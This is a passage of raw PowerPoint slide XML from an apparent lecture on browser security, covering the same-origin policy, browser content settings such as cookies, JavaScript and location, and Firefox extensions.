              <a:rPr spc="-10" dirty="0"/>
              <a:t>Security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74</a:t>
            </a:fld>
            <a:endParaRPr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514597" y="685292"/>
            <a:ext cx="280162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Browser</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-50" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0"/>
              <a:t>Security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75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17702" y="1415288"/>
            <a:ext cx="7935595" cy="35191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86385" marR="5080" indent="-273685">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buSzPct val="94230"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="287020" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2600" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Browsers </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>default security </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>features</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-490" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>are </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>focused </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-25" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>towards  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-30" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-130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applications</a:t>
            </a:r>
            <a:endParaRPr sz="26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buClr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:endParaRPr sz="3800">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="287020" marR="405765" indent="-274320">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buSzPct val="94230"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="287020" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Same</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-12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600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>origin</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-8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600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>policy</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-65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script</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-85" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-120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one</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-110" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>page</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-120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can</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-100" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-25" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>access  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>another</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-145" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-30" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-100" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>page</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-55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if</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="50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both</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-110" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>are</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-70" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-100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same</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-130" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>origin</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-45" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>URL</a:t>
            </a:r>
            <a:endParaRPr sz="26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Clr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:endParaRPr sz="3750">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="652780" lvl="1" indent="-247015">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc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2400" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>://www.example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>81</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>/dir/other.html</a:t>
            </a:r>
            <a:endParaRPr sz="24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575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2400" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>https</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>://w</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>ww</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>.ex</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>mple.com/dir/other.html</a:t>
            </a:r>
            <a:endParaRPr sz="24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514597" y="685292"/>
            <a:ext cx="280162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Browser</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-50" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0"/>
              <a:t>Security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7702" y="1334946"/>
            <a:ext cx="5836920" cy="3721735"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="9271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730"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buSzPct val="94230"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="287020" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2600" b="1" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Configure </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" b="1" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>content</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" b="1" spc="-200" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" b="1" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>settings</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="652780" marR="487680" lvl="1" indent="-247015">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="585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2400" i="1" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Cookies</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" i="1" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>storing cookie </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>as local</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-29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data  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-50" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>only, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>once browser program </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>exits,  cookies </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>are</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-21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deleted</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="652780" marR="458470" lvl="1" indent="-247015">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="575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2400" i="1" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" i="1" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Select </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>restrict</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-30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running  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>JavaScript code </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>from </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>any</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-39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website</a:t>
            </a:r>
            <a:endParaRPr sz="24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575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2400" i="1" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Pop‐ups</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" i="1" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>allow any site </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>show</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-43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pop‐ups</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="652780" marR="645160" lvl="1" indent="-247015">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="575"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0F6FC6"/>
              </a:buClr>
              <a:buSzPct val="83333"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="652780" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" i="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Location</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" i="1" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>not </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>allowing </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>site </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-280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track  physical</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-25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location</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constanti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010400" y="1676400"/>
            <a:ext cx="1905000" cy="19050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76</a:t>
            </a:fld>
            <a:endParaRPr dirty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611627" y="685292"/>
            <a:ext cx="460756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20" dirty="0"/>
              <a:t>Browser </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0"/>
              <a:t>Security:</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="30" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0"/>
              <a:t>Extension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65301" y="1482648"/>
            <a:ext cx="5704840" cy="108140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48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600" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Browser</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-100" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>extensions</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-60" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>enable</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-50" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>better</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-114" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>online</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-40" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>browsing</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-35" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>experience</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="287020" indent="-274320">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="385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600" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>E.g., </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Simple </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-45" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>YouTube </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>MP3/MP4 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Converter </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-225" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Downloader</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="652780" marR="26670" lvl="1" indent="-247015">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="345"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0F6FC6"/>
              </a:buClr>
              <a:buSzPct val="82142"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="652145" algn="l"/>
                <a:tab pos="652780" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>https://addons.mozilla.org/en‐us/firefox/addon/simple‐youtube‐  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>converter/?src=cb‐dl‐toprated</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constanti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990600" y="2819400"/>
            <a:ext cx="3896105" cy="34480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010400" y="2584703"/>
            <a:ext cx="1857755" cy="342442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937502" y="1696466"/>
            <a:ext cx="218948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latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Mozilla </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Firefox </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>alone</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-235" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>has  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>thousands of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-90" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>extensions</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia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77</a:t>
            </a:fld>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6632702" y="6275322"/>
            <a:ext cx="267906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100" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>https://addons.mozilla.org/en‐  us/firefox/extensions/photos‐music‐videos/</a:t>
            </a:r>
            <a:endParaRPr sz="11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101088" y="776732"/>
            <a:ext cx="5920740" cy="5791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600" spc="5" dirty="0"/>
